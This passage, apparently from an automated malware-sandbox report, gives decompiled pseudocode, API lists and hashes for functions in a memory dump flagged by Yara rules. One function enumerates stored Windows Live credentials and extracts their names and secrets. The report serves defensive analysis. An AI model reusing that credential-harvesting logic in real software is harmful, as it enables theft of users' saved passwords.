									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                0x0040f0a2
                                                                                0x0040f0a4
                                                                                0x0040f0a6
                                                                                0x0040f0a7
                                                                                0x0040f0a7
                                                                                0x0040f0ab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040f0ad
                                                                                0x0040f0ae
                                                                                0x0040f10a
                                                                                0x0040f10b
                                                                                0x0040f110
                                                                                0x0040f113
                                                                                0x0040f11a
                                                                                0x0040f11d
                                                                                0x0040f11f
                                                                                0x00000000
                                                                                0x0040f11f
                                                                                0x0040f125
                                                                                0x0040f0b5
                                                                                0x0040f0b7
                                                                                0x0040f0c3
                                                                                0x0040f0dc
                                                                                0x0040f0e9
                                                                                0x0040f102
                                                                                0x0040f117
                                                                                0x0040f119
                                                                                0x0040f104
                                                                                0x0040f104
                                                                                0x0040f105
                                                                                0x00000000
                                                                                0x0040f105
                                                                                0x0040f0eb
                                                                                0x0040f0eb
                                                                                0x0040f0ed
                                                                                0x00000000
                                                                                0x0040f0ed
                                                                                0x0040f0de
                                                                                0x0040f0de
                                                                                0x0040f0e0
                                                                                0x0040f0f2
                                                                                0x0040f0f3
                                                                                0x0040f0f8
                                                                                0x0040f0fb
                                                                                0x0040f0fb
                                                                                0x0040f0c5
                                                                                0x0040f0cd
                                                                                0x0040f0d2
                                                                                0x0040f0d5
                                                                                0x0040f0d5
                                                                                0x0040f0b9
                                                                                0x0040f0b9
                                                                                0x0040f0ba
                                                                                0x00000000
                                                                                0x0040f0ba
                                                                                0x00000000
                                                                                0x0040f0b7

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                • API String ID: 3510742995-3273207271
                                                                                • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                                • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040D865, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 69%
                                                                                			E0040D865(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406278();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404647( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046C2( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L00411612();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}






























                                                                                0x0040d86b
                                                                                0x0040d86e
                                                                                0x0040d878
                                                                                0x0040d879
                                                                                0x0040d87c
                                                                                0x0040d87f
                                                                                0x0040d881
                                                                                0x0040d886
                                                                                0x0040d88a
                                                                                0x0040d88c
                                                                                0x0040d88c
                                                                                0x0040d895
                                                                                0x0040d899
                                                                                0x0040d8a4
                                                                                0x0040d9e7
                                                                                0x0040d9f6
                                                                                0x0040d9f6
                                                                                0x0040d8ae
                                                                                0x0040d8b2
                                                                                0x0040d8b6
                                                                                0x0040d8ca
                                                                                0x0040d8ca
                                                                                0x0040d8b8
                                                                                0x0040d8c4
                                                                                0x0040d8c4
                                                                                0x0040d8ce
                                                                                0x00000000
                                                                                0x0040d8d4
                                                                                0x0040d8d4
                                                                                0x0040d8da
                                                                                0x0040d8de
                                                                                0x0040d9df
                                                                                0x0040d9e3
                                                                                0x00000000
                                                                                0x0040d8e4
                                                                                0x0040d8e9
                                                                                0x0040d8ed
                                                                                0x0040d8f4
                                                                                0x0040d913
                                                                                0x0040d917
                                                                                0x0040d91c
                                                                                0x0040d936
                                                                                0x0040d93c
                                                                                0x0040d93e
                                                                                0x0040d942
                                                                                0x0040d947
                                                                                0x0040d948
                                                                                0x0040d94d
                                                                                0x0040d952
                                                                                0x0040d964
                                                                                0x0040d96d
                                                                                0x0040d974
                                                                                0x0040d97a
                                                                                0x0040d97f
                                                                                0x0040d994
                                                                                0x0040d99f
                                                                                0x0040d99f
                                                                                0x0040d9ad
                                                                                0x0040d9c6
                                                                                0x0040d9c9
                                                                                0x0040d9c9
                                                                                0x0040d9c9
                                                                                0x0040d9af
                                                                                0x0040d9af
                                                                                0x0040d9be
                                                                                0x0040d9c1
                                                                                0x0040d9c1
                                                                                0x0040d9ad
                                                                                0x0040d952
                                                                                0x0040d936
                                                                                0x0040d9d0
                                                                                0x0040d9d5
                                                                                0x0040d9d5
                                                                                0x00000000
                                                                                0x0040d8e9
                                                                                0x0040d8de

                                                                                APIs
                                                                                  • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                • memset.MSVCRT ref: 0040D917
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                                • _strnicmp.MSVCRT ref: 0040D948
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                • String ID: WindowsLive:name=*$windowslive:name=
                                                                                • API String ID: 945165440-3589380929
                                                                                • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                                • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00407FEB, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E00407FEB(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E004118A0(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L004115B2();
					if(_t26 != 0) {
						E00407EC3(_t35,  &_v4360);
					}
				}
				return 1;
			}









                                                                                0x00407ff3
                                                                                0x0040800b
                                                                                0x00408011
                                                                                0x0040801c
                                                                                0x00408022
                                                                                0x0040802f
                                                                                0x00408037
                                                                                0x0040804f
                                                                                0x00408055
                                                                                0x00408068
                                                                                0x0040806e
                                                                                0x00408074
                                                                                0x00408079
                                                                                0x0040807a
                                                                                0x00408083
                                                                                0x0040808d
                                                                                0x00408093
                                                                                0x00408083
                                                                                0x0040809b

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00408011
                                                                                • GetDlgCtrlID.USER32 ref: 0040801C
                                                                                • GetWindowTextA.USER32 ref: 0040802F
                                                                                • memset.MSVCRT ref: 00408055
                                                                                • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                                                • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                                                  • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                • String ID: sysdatetimepick32
                                                                                • API String ID: 896699463-4169760276
                                                                                • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                                                • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405715, Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 98%
                                                                                			E00405715(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				void* __esi;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t89;
				signed int _t90;
				void* _t98;
				void* _t101;
				short* _t118;
				unsigned int _t126;
				intOrPtr _t128;
				signed int _t131;
				void* _t144;
				intOrPtr* _t146;
				short _t153;
				signed int _t155;

				_t129 = __ecx;
				_push(__ecx);
				_t74 = _a4 - 0x4e;
				_t155 = __ecx;
				if(_t74 == 0) {
					_t146 = _a12;
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00404D42(__eflags,  *_t146,  *(_t146 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
						L27:
						_t75 = 0;
						__eflags = 0;
						goto L28;
					} else {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
							goto L27;
						}
						_t76 =  *(_t146 + 0x14);
						__eflags = _t76 & 0x00000002;
						if((_t76 & 0x00000002) == 0) {
							L36:
							_t131 =  *(_t146 + 0x18) ^ _t76;
							__eflags = 0x0000f000 & _t131;
							if((0x0000f000 & _t131) == 0) {
								L39:
								__eflags =  *(_t146 + 0x14) & 0x00000002;
								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0x18) & 0x00000002;
								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0xc);
								E00401469(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
								E00401469(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t155 + 0x14)) = 1;
								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t155 + 0x14)) = 0;
								_t75 = 1;
								L28:
								return _t75;
							}
							L37:
							_t89 = E004048DC( *_t146,  *(_t146 + 0xc), 0xf002);
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) != 0) {
								_t90 = _t89 & 0x0000f000;
								__eflags = _t90 - 0x1000;
								_v8 = _t90;
								E00401469(_t155, 0x3ee, 0 | _t90 == 0x00001000);
								_v16 - 0x2000 = _v16 == 0x2000;
								E00401469(_t155, 0x3ef, 0 | _v16 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t146 + 0x18) & 0x00000002;
						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t98 = _t74 - 0xc2;
				if(_t98 == 0) {
					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
					E0040559F(_t155);
					goto L27;
				}
				_t101 = _t98 - 1;
				if(_t101 != 0) {
					goto L27;
				}
				_t126 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
					L7:
					if(_t126 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00404B35(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
						}
						if(_a8 == 0x3ec) {
							E00404B78(GetDlgItem( *(_t155 + 4), 0x3e9));
						}
						if(_a8 == 0x3ee) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00404BB4(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t155 + 4), 2);
						}
						if(_a8 == 1) {
							E00405538(_t155);
							EndDialog( *(_t155 + 4), 1);
						}
						_t75 = 1;
						goto L28;
					}
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
					_t129 = 0;
					if(_t128 <= 0) {
						L12:
						E0040559F(_t155);
						goto L13;
					}
					_t144 = 0;
					do {
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
						 *(_t118 + 2) = _t129;
						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
						_t129 = _t129 + 1;
						_t144 = _t144 + 0x14;
						 *_t118 = _t153;
					} while (_t129 < _t128);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004054C6(__ecx, __ecx);
						goto L7;
					}
				}
			}





















                                                                                0x00405715
                                                                                0x0040571b
                                                                                0x0040571f
                                                                                0x00405725
                                                                                0x00405727
                                                                                0x0040585b
                                                                                0x0040585e
                                                                                0x00405867
                                                                                0x00405869
                                                                                0x0040586c
                                                                                0x00405873
                                                                                0x00405879
                                                                                0x0040586c
                                                                                0x0040587a
                                                                                0x0040587e
                                                                                0x00405850
                                                                                0x00405850
                                                                                0x00405850
                                                                                0x00000000
                                                                                0x00405880
                                                                                0x00405880
                                                                                0x00405883
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405885
                                                                                0x00405888
                                                                                0x0040588f
                                                                                0x00405897
                                                                                0x0040589a
                                                                                0x0040589c
                                                                                0x0040589e
                                                                                0x004058ed
                                                                                0x004058ed
                                                                                0x004058f1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004058f7
                                                                                0x004058fb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405905
                                                                                0x00405913
                                                                                0x00405921
                                                                                0x0040592f
                                                                                0x0040594d
                                                                                0x00405950
                                                                                0x00405956
                                                                                0x00405959
                                                                                0x00405852
                                                                                0x00405858
                                                                                0x00405858
                                                                                0x004058a0
                                                                                0x004058aa
                                                                                0x004058b2
                                                                                0x004058b4
                                                                                0x004058b6
                                                                                0x004058ba
                                                                                0x004058c2
                                                                                0x004058ce
                                                                                0x004058dd
                                                                                0x004058e8
                                                                                0x004058e8
                                                                                0x00000000
                                                                                0x004058b4
                                                                                0x00405891
                                                                                0x00405895
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405895
                                                                                0x0040587e
                                                                                0x0040572d
                                                                                0x00405732
                                                                                0x00405844
                                                                                0x0040584b
                                                                                0x00000000
                                                                                0x0040584b
                                                                                0x00405738
                                                                                0x00405739
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405742
                                                                                0x00405748
                                                                                0x00405762
                                                                                0x00405765
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405771
                                                                                0x004057a6
                                                                                0x004057b7
                                                                                0x004057bf
                                                                                0x004057bf
                                                                                0x004057ca
                                                                                0x004057d2
                                                                                0x004057d2
                                                                                0x004057dd
                                                                                0x004057e8
                                                                                0x004057ee
                                                                                0x004057f5
                                                                                0x00405800
                                                                                0x00405806
                                                                                0x00405812
                                                                                0x00405819
                                                                                0x00405819
                                                                                0x00405820
                                                                                0x00405822
                                                                                0x0040582c
                                                                                0x0040582c
                                                                                0x00405830
                                                                                0x00000000
                                                                                0x00405830
                                                                                0x00405776
                                                                                0x00405779
                                                                                0x0040577d
                                                                                0x004057a0
                                                                                0x004057a1
                                                                                0x00000000
                                                                                0x004057a1
                                                                                0x0040577f
                                                                                0x00405781
                                                                                0x00405786
                                                                                0x00405789
                                                                                0x00405790
                                                                                0x00405795
                                                                                0x00405796
                                                                                0x0040579b
                                                                                0x0040579b
                                                                                0x00000000
                                                                                0x00405751
                                                                                0x00405757
                                                                                0x00000000
                                                                                0x0040575d
                                                                                0x0040575d
                                                                                0x00000000
                                                                                0x0040575d
                                                                                0x00405757

                                                                                APIs
                                                                                • GetDlgItem.USER32 ref: 004057BD
                                                                                • GetDlgItem.USER32 ref: 004057D0
                                                                                • GetDlgItem.USER32 ref: 004057E5
                                                                                • GetDlgItem.USER32 ref: 004057FD
                                                                                • EndDialog.USER32(?,00000002), ref: 00405819
                                                                                • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                                  • Part of subcall function 004054C6: GetDlgItem.USER32 ref: 004054D4
                                                                                  • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                                  • Part of subcall function 004054C6: SendMessageA.USER32 ref: 00405505
                                                                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Item$DialogMessageSend
                                                                                • String ID:
                                                                                • API String ID: 2485852401-0
                                                                                • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                                                • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405960, Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E00405960(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L004115D0();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L004115D6();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E004049FB(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L004115D0();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E00408441( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L004115D0();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
						} while (_t86 != 0);
					}
					_v8 = 1;
				}
				if(E00401540(0x448, _t80, _a4) == 1) {
					E004083B1( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
					InvalidateRect(( *(_t80 + 0xc))[2], 0, 0);
				}
				_t47 = SetFocus(_a8);
				if(_v8 != 0) {
					_push( *(_t80 + 0x10));
					L004115D6();
				}
				return _t47;
			}


















                                                                                0x00405960
                                                                                0x00405964
                                                                                0x00405969
                                                                                0x0040596b
                                                                                0x0040596e
                                                                                0x00405971
                                                                                0x00405979
                                                                                0x00405981
                                                                                0x0040597b
                                                                                0x0040597b
                                                                                0x0040597d
                                                                                0x0040597d
                                                                                0x00405983
                                                                                0x00405986
                                                                                0x00405988
                                                                                0x0040598a
                                                                                0x0040598c
                                                                                0x0040598d
                                                                                0x00405993
                                                                                0x00405993
                                                                                0x00405999
                                                                                0x0040599c
                                                                                0x004059a6
                                                                                0x004059a7
                                                                                0x004059aa
                                                                                0x004059b3
                                                                                0x004059b4
                                                                                0x004059c3
                                                                                0x004059c5
                                                                                0x004059d3
                                                                                0x004059d8
                                                                                0x004059db
                                                                                0x004059e0
                                                                                0x004059e7
                                                                                0x004059ea
                                                                                0x004059f3
                                                                                0x004059f4
                                                                                0x004059fc
                                                                                0x004059ff
                                                                                0x00405a01
                                                                                0x00405a03
                                                                                0x00405a06
                                                                                0x00405a0e
                                                                                0x00405a11
                                                                                0x00405a11
                                                                                0x00405a03
                                                                                0x00405a14
                                                                                0x00405a14
                                                                                0x00405a2c
                                                                                0x00405a34
                                                                                0x00405a41
                                                                                0x00405a41
                                                                                0x00405a4a
                                                                                0x00405a53
                                                                                0x00405a55
                                                                                0x00405a58
                                                                                0x00405a5d
                                                                                0x00405a61

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                • String ID:
                                                                                • API String ID: 2313361498-0
                                                                                • Opcode ID: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                                • Opcode Fuzzy Hash: e9f0ab907bec5e8f57c7acbac99c3809d1984f2ed9ff4bf297ffd43cd07246d7
                                                                                • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A698, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040A698(void* __esi) {
				struct HDWP__* _v8;
				int _v12;
				intOrPtr _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* _t32;
				int _t60;
				int _t65;

				if( *((intOrPtr*)(__esi + 0x124)) != 0) {
					GetClientRect( *(__esi + 0x108),  &_v32);
					GetWindowRect( *(__esi + 0x114),  &_v48);
					_t65 = _v48.bottom - _v48.top + 1;
					GetWindowRect( *(__esi + 0x118),  &_v48);
					_v12 = _v32.right - _v32.left;
					_t60 = _v48.bottom - _v48.top + 1;
					_v16 = _v32.bottom - _v32.top;
					_v8 = BeginDeferWindowPos(3);
					DeferWindowPos(_v8,  *(__esi + 0x118), 0, 0, 0, _v12, _t60, 4);
					DeferWindowPos(_v8,  *(__esi + 0x114), 0, 0, _v32.bottom - _t65 + 1, _v12, _t65, 6);
					DeferWindowPos(_v8,  *( *((intOrPtr*)(__esi + 0x370)) + 0x184), 0, 0, _t60, _v12, _v16 - _t60 - _t65, 4);
					return EndDeferWindowPos(_v8);
				}
				return _t32;
			}











                                                                                0x0040a6a5
                                                                                0x0040a6b7
                                                                                0x0040a6cd
                                                                                0x0040a6df
                                                                                0x0040a6e0
                                                                                0x0040a6ee
                                                                                0x0040a6f9
                                                                                0x0040a6fa
                                                                                0x0040a709
                                                                                0x0040a71a
                                                                                0x0040a73a
                                                                                0x0040a761
                                                                                0x00000000
                                                                                0x0040a771
                                                                                0x0040a773

                                                                                APIs
                                                                                • GetClientRect.USER32 ref: 0040A6B7
                                                                                • GetWindowRect.USER32 ref: 0040A6CD
                                                                                • GetWindowRect.USER32 ref: 0040A6E0
                                                                                • BeginDeferWindowPos.USER32 ref: 0040A6FD
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                                • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$Defer$Rect$BeginClient
                                                                                • String ID:
                                                                                • API String ID: 2126104762-0
